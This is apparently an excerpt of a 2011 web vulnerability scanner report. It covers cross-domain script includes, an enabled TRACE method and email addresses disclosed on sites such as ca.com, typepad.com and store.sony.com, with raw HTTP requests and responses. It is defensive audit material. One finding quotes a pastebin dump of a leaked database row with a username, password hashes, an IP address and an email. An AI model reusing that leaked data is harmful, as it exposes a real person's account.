X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:25:47 GMT
Content-Length: 458334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<scri
...[SNIP]...
<link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />-->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

13.18. https://www.ca.com/us/register/forgotpassword.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/forgotpassword.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/register/forgotpassword.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351628610:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:27:17 GMT
Content-Length: 29060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta http-
...[SNIP]...
<link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />-->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

13.19. https://www.ca.com/us/register/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/login.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:23:42 GMT
Content-Length: 36056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<meta htt
...[SNIP]...
<link href="/~/media/css/legacy-global.css" rel="stylesheet" type="text/css" media="screen" />-->


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

13.20. http://www.javalobby.org/articles/acegisecurity/part1.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javalobby.org
Path:   /articles/acegisecurity/part1.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /articles/acegisecurity/part1.jsp HTTP/1.1
Host: www.javalobby.org
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.2.1
Content-Type: text/html; charset=ISO-8859-1
Date: Tue, 06 Sep 2011 17:55:34 GMT
Content-Length: 33566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
   <head>

       <title>Securing Your Java Applications - Acegi Security Style</title>
<meta http-equiv="content-type"
...[SNIP]...
</div>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

13.21. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.javaworld.com
Path:   /javaworld/jw-10-2007/jw-10-acegi2.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1
Host: www.javaworld.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:45:52 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Cneonction: close
Content-Type: text/html; charset=UTF-8
Content-Length: 67949


<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=08b8cb24471b1cc051c579449c9641156b959aaa&callback=OPG.Demandbase.dbase_parse"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://widgets.dzone.com/links/widgets/zoneit.js"></script>
...[SNIP]...
</form>
       <script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</h2>
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=1&layt=10&fmt=simp&tr=premium"></script>
...[SNIP]...
<div style="padding:6px; background-color:#ededed; border:1px solid #D6D3D3; width:634px; margin-top:12px;">
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<!--//HARDCODED BY JCROCI 6/25/11 -->
<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=93&ct=JAVAWORLD_HP_ROS&num=5&layt=10&fmt=simp"></script>
...[SNIP]...
<!--bhauck 3/7/2010-->
   <script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

14. TRACE method is enabled  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.typepad.com
Path:   /

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.typepad.com
Cookie: 789027bdcab58768

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 20:52:09 GMT
Server: Apache
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.typepad.com
Cookie: 789027bdcab58768
X-Forwarded-For: 50.23.123.106, 10.17.141.102
X-6a-Remote: 10.17.141.102:39818
X-6a-Bticks: 0035524
X-6a-BTime: 632813362
Connection: keep-alive


15. Email addresses disclosed  previous  next
There are 9 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


15.1. http://blog.trendmicro.com/wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.trendmicro.com
Path:   /wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/plugins/what-would-seth-godin-do/jquery.cookie.js HTTP/1.1
Host: blog.trendmicro.com
Proxy-Connection: keep-alive
Referer: http://blog.trendmicro.com/?p=12640
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fsearch%2F%3Fq%3Dxss%26search.x%3D2%26search.y%3D10%26search%3Dsearch%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350988973%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%3Fp%3D12640%22%2C%22l%22%3A%22XSS%20Methods%20Also%20Seen%20Being%20Used%20in%20Mass%20Compromises%22%2C%22rb%22%3A%221%22%2C%22ri%22%3A%221%22%2C%22de%22%3A%7B%22ti%22%3A%22Search%22%2C%22nw%22%3A393%2C%22nl%22%3A141%7D%7D

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Content-Type: application/x-javascript
Last-Modified: Mon, 22 Aug 2011 01:04:54 GMT
ETag: "1a4489-e81-4ab0daab8b980"
X-Varnish: 1940592412
Cache-Control: max-age=14400
Expires: Tue, 06 Sep 2011 22:16:27 GMT
Date: Tue, 06 Sep 2011 18:16:27 GMT
Content-Length: 3713
Connection: close
Vary: Accept-Encoding

/*jslint browser: true */ /*global jQuery: true */

/**
* jQuery Cookie plugin
*
* Copyright (c) 2010 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opens
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given key.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String key The key of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function (key, value, options) {

// key and at least value given, set cookie...
if (arguments.length >
...[SNIP]...

15.2. http://pastebin.com/bq8xJPMn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /bq8xJPMn

Issue detail

The following email address was disclosed in the response:

Request

GET /bq8xJPMn HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=2; expires=Tue, 04-Oct-2011 18:10:35 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 373099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<div class="de2">('1', 's0lar', 'bd1922cfd5641afff0790119143744e13ccf32d5', ' ./images/defaultdp.jpg', 'tester \\\'', '18th of July 2011', '3765', '86.20.134.119', 'adam@adamonsecurity.com', '1e73d5d229da303e4e7f701c984f00b1833c5f58', '3', '0a40e0eb0a710510fb56cac378ef533be84c904e', 'A', '', '0', '1', '1', '1', '1', '1313347989')</div>
...[SNIP]...
`mailflag_pmpub`, `mailflag_pmstaff`, `lastvisit`|
('1', 's0lar', 'bd1922cfd5641afff0790119143744e13ccf32d5', ' ./images/defaultdp.jpg', 'tester \\\'', '18th of July 2011', '3765', '86.20.134.119', 'adam@adamonsecurity.com', '1e73d5d229da303e4e7f701c984f00b1833c5f58', '3', '0a40e0eb0a710510fb56cac378ef533be84c904e', 'A', '', '0', '1', '1', '1', '1', '1313347989')

========================
MySQL Information:
========
...[SNIP]...

15.3. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=check#true#1315352981|session#1315352920400-736912#1315354781; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 34927
Content-Type: application/x-javascript
Content-Length: 34927
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:34 GMT
Connection: close
Cache-Control: private

// script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

15.4. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; mbox=check#true#1315352981|session#1315352920400-736912#1315354781; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 31605
Content-Type: application/x-javascript
Content-Length: 31605
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:34 GMT
Connection: close
Cache-Control: private

// script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

15.5. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 12 Aug 2011 22:13:59 GMT
Accept-Ranges: bytes
ntCoent-Length: 35386
Content-Type: application/x-javascript
Content-Length: 35386
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:33 GMT
Connection: close
Cache-Control: private

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
5trk`F$E)#N=#d($J,(vt#qt`cvt)`j+s.hav()+q+(qs?qs:s.rq(^A)),0#g);qs`n;`am('t')`5s.p_r)s.p_r(`U`d`n}^K(qs);^n`z(@w;`v@w`M^8,`H$b1',vb`U@Y=^V=`N`p=`N^W=`G`m''`5#Z)`G@9@Y=`G@9eo=`G@9^6`p="
+"`G@9^6^W`n`5!id@5s.tc@Ctc=1;s.flush`W()}`2#N`9tl`0o,t,n,vo`1;s.@Y=$Po);`N^W=t;`N`p=n;s.t(@w}`5pg){`G@9co`0o){`I@2\"_\",1,#v`2$Po)`9wd@9gs`0$M{`I@2#Q1,#v`2s.t()`9wd@9dc`0$M{`I@2#Q#v`2s.t()}}@Ll=(`G`"
+"Q`k`8`4$Ns$90`Ud=^E;
...[SNIP]...

15.6. https://www.ca.com/us/register/createprofile.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/createprofile.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 18:25:47 GMT
Content-Length: 458334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<scri
...[SNIP]...
</a> and enter your email address (pmfkey@ca.com) for your initial access.</p>
...[SNIP]...
<div class="formtip2 blue small">(john.smith@company.com)<br />
...[SNIP]...

15.7. https://www.ca.com/us/register/forgotpassword.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
